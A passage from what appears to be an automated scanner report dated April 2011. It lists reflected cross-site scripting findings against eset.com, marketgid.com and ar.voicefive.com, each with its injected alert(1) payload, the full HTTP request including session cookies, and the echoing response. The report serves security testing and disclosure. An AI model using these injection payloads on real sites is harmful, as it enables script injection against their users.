X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=619e4"-alert(1)-"482a8458b9e";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.51. http://www.eset.com/us [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4087"-alert(1)-"8cebc1897b2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B
Referer: http://www.google.com/search?hl=en&q=f4087"-alert(1)-"8cebc1897b2

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:18:23 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Mon, 25 Apr 2011 15:18:23 GMT
X-Varnish: 555657802
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=f4087"-alert(1)-"8cebc1897b2";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.52. http://www.eset.com/us/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 631c6"-alert(1)-"5990df6aee9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B
Referer: http://www.google.com/search?hl=en&q=631c6"-alert(1)-"5990df6aee9

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=4; expires=Fri, 24-Jun-2011 15:20:14 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26742
Date: Mon, 25 Apr 2011 15:20:14 GMT
X-Varnish: 555663552
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=631c6"-alert(1)-"5990df6aee9";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.53. http://www.eset.com/us/business/products [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/business/products

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c73f"-alert(1)-"f9f42456929 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=7c73f"-alert(1)-"f9f42456929

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21125
Date: Mon, 25 Apr 2011 12:53:27 GMT
X-Varnish: 1310966651
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=7c73f"-alert(1)-"f9f42456929";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.54. http://www.eset.com/us/business/server-security/linux-file [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/business/server-security/linux-file

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95bca"-alert(1)-"1b87eb369cb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=95bca"-alert(1)-"1b87eb369cb
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17267
Date: Mon, 25 Apr 2011 12:59:23 GMT
X-Varnish: 1310979390
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=95bca"-alert(1)-"1b87eb369cb";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.55. http://www.eset.com/us/home/smart-security [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/home/smart-security

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec105"-alert(1)-"6412896c31 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=ec105"-alert(1)-"6412896c31
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952767|check#true#1303743227|session#1303743154006-383984#1303745027; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.2.10.1303743158; s_pers=%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%252C%255B%2527Other%252520Referrers-shopping.netsuite.com%2527%252C%25271303743170439%2527%255D%255D%7C1461595970439%3B%20s_visit%3D1%7C1303745017240%3B%20gpv_pageName%3Dus/new_homepage%7C1303745017242%3B%20s_nr%3D1303743217244-Repeat%7C1335279217244%3B%20s_invisit%3Dtrue%7C1303745017246%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedshopping.netsuite.comshopping.netsuite.com%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25525
Date: Mon, 25 Apr 2011 15:18:50 GMT
X-Varnish: 555659225
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=ec105"-alert(1)-"6412896c31";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.56. http://www.eset.com/us/store [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/store

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b284d"-alert(1)-"70192e64f96 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=b284d"-alert(1)-"70192e64f96
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38902
Date: Mon, 25 Apr 2011 12:59:41 GMT
X-Varnish: 1310980199
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
n
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=b284d"-alert(1)-"70192e64f96";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.57. http://www.eset.com/us/styles/store-new.css [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/styles/store-new.css

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47973"-alert(1)-"4198eb1d78a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/styles/store-new.css HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=47973"-alert(1)-"4198eb1d78a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 13:02:15 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Mon, 25 Apr 2011 13:02:15 GMT
X-Varnish: 1310986158
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=47973"-alert(1)-"4198eb1d78a";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

5.58. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.marketgid.com
Path:	/pnews/773204/i/7269/pp/2/1/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 8efb9<script>alert(1)</script>2ae95f37538 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pnews/773204/i/7269/pp/2/1/ HTTP/1.1
Host: www.marketgid.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MGformStatus=2; __utma=250877338.2141066310.1303423654.1303423654.1303423654.1; __utmz=250877338.1303423654.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral; __gads=ID=909f464f6199feed:T=1303423666:S=ALNI_MY6fIaxdoRzO_fDyTrK1Li9f5G69A; __qca=P0-972785183-1303423664935
Referer: http://www.google.com/search?hl=en&q=8efb9<script>alert(1)</script>2ae95f37538

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:33:37 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: CookiePNewsPage=1; path=/; expires=Tue, 26-Apr-2011 14:33:37 GMT
Cache-Control: no-cache, must-revalidate
Content-Length: 48806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="mgnvgfd5yref" style="display:none">http://www.google.com/search?hl=en&q=8efb9<script>alert(1)</script>2ae95f37538</div>
...[SNIP]...

5.59. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 1146c<script>alert(1)</script>154e165be29 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
